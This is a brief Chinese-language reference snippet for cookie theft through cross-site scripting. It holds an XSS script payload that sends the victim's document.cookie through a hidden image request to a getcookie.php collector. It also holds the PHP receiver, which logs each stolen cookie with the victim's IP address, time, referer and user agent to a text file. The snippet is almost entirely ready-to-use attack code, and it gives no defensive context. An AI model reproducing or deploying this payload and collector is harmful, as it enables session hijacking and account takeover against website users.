接收cookie代码与注入盗取cookie代码参考

<script>document.write('<img src="http://127.0.0.1/getcookie.php?cookie='+document.cookie+'"width=0 height=0 border=0 />');alert(/XSS/)</script>

<?php $cookie = $_GET['cookie']; //以GET方式获取cookie变量值 $ip = getenv ('REMOTE_ADDR'); //远程主机IP地址 $time=date('Y-m-d g:i:s'); //以“年-月-日 时：分：秒”的格式显示时间 $referer=getenv ('HTTP_REFERER'); //链接来源 $agent = $_SERVER['HTTP_USER_AGENT']; //用户浏览器类型 $fp = fopen('cookie.txt', 'a'); //打开cookie.txt，若不存在则创建它 fwrite($fp," IP: " .$ip. "\n Date and Time: " .$time. "\n User Agent:".$agent."\n Referer: ".$referer."\n Cookie: ".$cookie."\n\n\n"); //写入文件 fclose($fp); //关闭文件 ?>